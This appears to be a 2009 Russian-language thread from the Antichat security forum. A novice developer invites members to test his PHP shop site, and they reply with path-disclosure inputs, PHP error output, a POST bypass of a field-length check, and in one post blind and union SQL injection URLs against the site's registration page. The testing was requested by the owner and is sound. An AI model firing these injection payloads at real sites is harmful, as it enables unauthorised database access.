ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Перезагрузить страницу http://mag.demix.org/
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

http://mag.demix.org/
  #1  
Старый 15.06.2009, 01:12
demixok
Новичок
Регистрация: 12.06.2009
Сообщений: 6
Провел на форуме:
6721

Репутация: 0
Exclamation http://mag.demix.org/
http://mag.demix.org/

Вот пол года пишу на пхп и решил зделать собственный скрипт! прошу протестить так как думаю скрипт дырявый! у меня VDS по этому мучать сервак желательно лиш бы найти по максимуму уязвимости!

Всем спасибо!
 
Ответить с цитированием

  #2  
Старый 17.06.2009, 12:27
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию
раскрытие путей:
Вход партнёрам, Напомнить пароль, Вспомнить пароль ставим кавычку во всех полях... вобщем поставь проверку на левые символы в login.php
Последний раз редактировалось Adm1n4eG; 17.06.2009 в 12:34..
 
Ответить с цитированием

  #3  
Старый 17.06.2009, 12:37
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
в востановлении пароля аналогично
 
Ответить с цитированием

  #4  
Старый 17.06.2009, 12:43
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию
еще раскрытие путей В поле № счёта ICQ-магазин пишем любое число больше 10 символов.

И что то еще с регистрацией как ни пытался зарегистрироваться все время Ошибка сервера и опять же раскрытие путей ))))
Последний раз редактировалось Adm1n4eG; 17.06.2009 в 12:50..
 
Ответить с цитированием

  #5  
Старый 17.06.2009, 12:49
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме:
1636674

Репутация: 171


По умолчанию
капча не генериться (
 
Ответить с цитированием

  #6  
Старый 17.06.2009, 15:13
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию
http://mag.demix.org/login.php?a=remind
Логин = Пароль = '%00
Код:
Warning: fopen(temp/banip.txt) [function.fopen]: failed to open stream: Permission denied in /[cut]/serfing.php on line 55
Восстановление пароля:
емейл: '%00
Код:
Warning: fopen(/error.log) [function.fopen]: failed to open stream: Permission denied in /[cut]/function.php on line 111
Последний раз редактировалось BlackSun; 17.06.2009 в 16:15.. Причина: пути не палим
 
Ответить с цитированием

  #7  
Старый 18.06.2009, 01:33
demixok
Новичок
Регистрация: 12.06.2009
Сообщений: 6
Провел на форуме:
6721

Репутация: 0
По умолчанию
Вроде всё исправил тестим
 
Ответить с цитированием

  #8  
Старый 18.06.2009, 03:14
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию
http://mag.demix.org/icq.php?a=kup&n=jkjk
Код:
Warning: fopen(/error.log) [function.fopen]: failed to open stream: Permission denied in /***/function.php on line 111
http://mag.demix.org/icq.php?n=12321345hjk&a=sch
Ваш WMID: asdas
Код:
Warning: _WMXML1() [function.-wmxml1]: Node no longer exists in /***/wmxml.inc.php on line 129
http://mag.demix.org/reg.php?rules=gjhghj&end=5+and+1=if(ascii(lower(su bstring(version(),1,1)))=52,(select+1+union+select +2),0)+--

http://mag.demix.org/reg.php?rules=gjhghj&end=5+union+select+1+--
Последний раз редактировалось laedafess; 18.06.2009 в 03:30..
 
Ответить с цитированием

  #9  
Старый 18.06.2009, 10:59
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию
а здесь бага осталась ))) ты ограничел число вводимых символов в поле № счёта но POST запросом можно ввести опять же любое число больше 10 символов.

POST http://mag.demix.org/icq.php?a=prov&wminvid=999999999999999999&send=371 94

Цитата:
Warning: _WMXML4() [function.-wmxml4]: Node no longer exists in /home/[скрыто]/wmxml.inc.php on line 164
 
Ответить с цитированием

  #10  
Старый 18.06.2009, 23:04
demixok
Новичок
Регистрация: 12.06.2009
Сообщений: 6
Провел на форуме:
6721

Репутация: 0
По умолчанию
Цитата:
Сообщение от Adm1n4eG  
а здесь бага осталась ))) ты ограничел число вводимых символов в поле № счёта но POST запросом можно ввести опять же любое число больше 10 символов.

POST http://mag.demix.org/icq.php?a=prov&wminvid=999999999999999999&send=371 94


Исправил!
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ